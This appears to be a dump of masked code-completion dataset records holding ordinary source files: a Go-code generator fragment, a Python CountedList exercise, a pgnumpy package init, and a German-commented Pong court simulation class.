*{2}Repo) Create(agent {0}) (string, error) {1}\\n\".format(dictiony[\"dbname\"], \"{\", dictiony[\"dbname\"]))\ngo.write(\" query := `INSERT INTO {} (\\n\".format(dictiony[\"dbname\"]))\ngo.write(\" id, \\n name,\\n phonenumber,\\n address,\\n\")\ngo.write(\" description)\\n values($1, $2, $3, $4, $5);`\\n\")\ngo.write(\" prp, err := ica.db.Prepare(query)\\n\\n \")\ngo.write(' if err != nil ')\ngo.write(\"{\\n\")\ngo.write(' return \"\", err\\n')\ngo.write(\" }\\n\")\ngo.write(\" _, err = 
prp.Exec(\\n\")\ngo.write(\" agent.ID,\\n agent.Name,\\n\")\ngo.write(\" agent.PhoneNumber,\\n agent.Address,\\n agent.Description,\\n )\\n\")\ngo.write(\" if err != nil {\\n \")\ngo.write('return \"\", err\\n }\\n\\n')\ngo.write(\" return agent.ID, err\\n}\")\n\n#get\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Counted List
Create a class for an list like object based on UserList wrapper
https://docs.python.org/3/library/collections.html#collections.UserList
That object should have a method to return a Counter
https://docs.python.org/3/library/collections.html#collections.Counter
for all objects in the list
Counter should be updated automatically for at least 2 methods (append, pop)
"""
# example to test code
# class Example(UserList)
# ...
#
# x = Example(['1', '2', '3'])
# y = x.get_counter() # y contains Counter({'1':1, '2':1, '3':1})
# x.append(3)
# now y contains Counter({'1':1, '2':1, '3':2})
from collections import UserList,Counter
class CountedList(UserList):
    """A list that keeps a live ``Counter`` of its contents.

    ``Count()`` returns the Counter object itself; mutating the list via
    ``append``/``pop`` updates that same object in place, so references
    obtained earlier stay current automatically (no module-global rebinding,
    which the original relied on and which only covered ``append``).
    """

    def __init__(self, initlist=None):
        super().__init__(initlist)
        # Live tally of the current contents, shared with Count() callers.
        self.cnt = Counter(self.data)

    def Count(self):
        # Rebuild from self.data so direct mutations of .data are also
        # reflected, then hand back the shared Counter object.
        self.cnt.clear()
        self.cnt.update(self.data)
        return self.cnt

    def append(self, item):
        super().append(item)
        self.cnt[item] += 1

    def pop(self, i=-1):
        # Bug fix: the original only synchronised the counter on append();
        # the exercise requires at least append and pop to keep it current.
        item = super().pop(i)
        self.cnt[item] -= 1
        if not self.cnt[item]:
            del self.cnt[item]  # drop zero counts so equality checks stay clean
        return item
# Demo: build a counted list, grab its counter, and show that the counter
# tracks a later append.
countedlist=CountedList(['1', '2', '3'])
y=countedlist.Count()
print(y)  # Counter({'1': 1, '2': 1, '3': 1})
countedlist.append('3')
print(y)  # the counter followed the append: '3' now has count 2
|
normal
|
{
"blob_id": "1cf4fc37e030a895cb36f537ce9e92df34acfb8b",
"index": 7659,
"step-1": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\n<mask token>\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-3": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\ncountedlist = CountedList(['1', '2', '3'])\ny = countedlist.Count()\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-4": "<mask token>\nfrom collections import UserList, Counter\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\ncountedlist = CountedList(['1', '2', '3'])\ny = countedlist.Count()\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-5": "\"\"\"\nCounted List\nCreate a class for an list like object based on UserList wrapper\nhttps://docs.python.org/3/library/collections.html#collections.UserList\nThat object should have a method to return a Counter\nhttps://docs.python.org/3/library/collections.html#collections.Counter\nfor all objects in the list\nCounter should be updated automatically for at lest 2 methods (append, pop)\n\"\"\"\n\n# example to test code\n# class Example(UserList)\n# ...\n#\n# x = Example(['1', '2', '3'])\n# y = x.get_counter() # y contains Counter({'1':1, '2':1 '3':1})\n# x.append(3)\n# now y contains Counter({'1':1, '2':1 '3':2})\n\nfrom collections import UserList,Counter\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt=Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList,self).append(item)\n global y\n y = self.Count()\n\ncountedlist=CountedList(['1', '2', '3'])\ny=countedlist.Count()\nprint(y)\n\ncountedlist.append('3')\nprint(y)\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Print the name repeated 1000 times on one line; the trailing space in the
# literal separates consecutive copies.
name = 'valentina '
repeat_count = 1000
print(repeat_count * name)
|
normal
|
{
"blob_id": "aff1a9263e183610f403a4d6a7f27b45eacb7ff2",
"index": 0,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(name * 1000)\n",
"step-3": "name = 'valentina '\nprint(name * 1000)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
Package:
pgnumpy
Description
A class and a set of functions for interacting with a PostgreSql database.
A C++ extension module allows returning results as a NumPy array. Numpy
arrays can also be written to tables.
The workhorse class is called PgNumpy
This class has limited functionality compared to the full Python database
api specification. It can execute arbitrary queries and extract results
into numpy arrays. However, cursors are not yet supported. For getting
results, only the fetchall() command is available, as the goal is always to
extract all rows into a single numpy structure rather than work row by row.
    More generic DB-API compliant packages like psycopg are more suitable when
more flexible operations are needed.
Classes:
PgNumpy:
The class used in all database interactions. This class represents a
database connection and facilitates executing queries and extracting
results. See docs for pgnumpy.PgNumpy for more details.
PgInput:
A class for writing input files for use in a COPY into the database.
ArrayWriter:
Write arrays to a file for input to postgres. This slower version can
be used if recfile is not available.
ArrayStringifier:
Make a string from an array, possibly with brackets indicating
dimensions.
Convenience Functions:
connect:
Create a database connection, returning a PgNumpy object. If conninfo
is None or "" then the "default" connection based on the PGUSER and
PGDATABASE environment variables is used.
array2table:
Write array with fields (a structure) to a postgres table. If the
table does not yet exist it is created with column definitions based on
the input array. If it does exist the data are appended as new rows in
the table.
"""
import pgnumpy
import cpgnumpy
from pgnumpy import connect
from pgnumpy import PgNumpy
from pgnumpy import PgInput
from pgnumpy import ArrayWriter
from pgnumpy import ArrayStringifier
from pgnumpy import array2table
#from pgnumpy import tables
#from pgnumpy import table_exists
#from pgnumpy import describe
from pgnumpy import test
from pgnumpy import test_simple
#from pgnumpy import obliterate
#from pgnumpy import compare_arrays
# Prefer psycopg2's fully DB-API compliant connect() when it is installed;
# otherwise the pgnumpy.connect imported above remains in effect.
try:
    from psycopg2 import connect
except ImportError:
    # Bug fix: a bare `except:` also swallowed KeyboardInterrupt/SystemExit
    # and unrelated errors raised while importing psycopg2.
    pass
|
normal
|
{
"blob_id": "7e5cf782692d9cfb2718b2efcc83efa2ecb815cd",
"index": 1371,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-3": "<mask token>\nimport pgnumpy\nimport cpgnumpy\nfrom pgnumpy import connect\nfrom pgnumpy import PgNumpy\nfrom pgnumpy import PgInput\nfrom pgnumpy import ArrayWriter\nfrom pgnumpy import ArrayStringifier\nfrom pgnumpy import array2table\nfrom pgnumpy import test\nfrom pgnumpy import test_simple\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-4": "\"\"\"\nPackage:\n pgnumpy\nDescription\n\n A class and a set of functions for interacting with a PostgreSql database.\n A C++ extension module allows returning results as a NumPy array. Numpy\n arrays can also be written to tables. \n \n The workhorse class is called PgNumpy\n\n This class has limited functionality compared to the full Python database\n api specification. It can execute arbitrary queries and extract results\n into numpy arrays. However, cursors are not yet supported. For getting\n results, only the fetchall() command is available, as the goal is always to\n extract all rows into a single numpy structure rather than work row by row.\n \n More generic DB-API compliant packges like psycopg are more suitable when\n more flexible operations are needed.\n\nClasses:\n PgNumpy: \n The class used in all database interactions. This class represents a\n database connection and facilitates executing queries and extracting\n results. See docs for pgnumpy.PgNumpy for more details.\n PgInput: \n A class for writing input files for use in a COPY into the database.\n ArrayWriter: \n Write arrays to a file for input to postgres. This slower version can\n be used if recfile is not available.\n ArrayStringifier: \n Make a string from an array, possibly with brackets indicating\n dimensions.\n\n\nConvenience Functions:\n\n connect:\n Create a database connection, returning a PgNumpy object. If conninfo\n is None or \"\" then the \"default\" connection based on the PGUSER and\n PGDATABASE environment variables is used.\n\n array2table:\n Write array with fields (a structure) to a postgres table. If the\n table does not yet exist it is created with column definitions based on\n the input array. If it does exist the data are appended as new rows in\n the table. 
\n\n\"\"\"\n\nimport pgnumpy\nimport cpgnumpy\n\nfrom pgnumpy import connect\nfrom pgnumpy import PgNumpy\nfrom pgnumpy import PgInput\nfrom pgnumpy import ArrayWriter\nfrom pgnumpy import ArrayStringifier\nfrom pgnumpy import array2table\n\n#from pgnumpy import tables\n#from pgnumpy import table_exists\n#from pgnumpy import describe\nfrom pgnumpy import test\nfrom pgnumpy import test_simple\n#from pgnumpy import obliterate\n#from pgnumpy import compare_arrays\n\n# attempt to import the connect method from psycopg2\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
<|reserved_special_token_0|>
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
def __sensor_bat(self, player):
"""
Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, Schlägerposition von Spieler[Player]
"""
return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
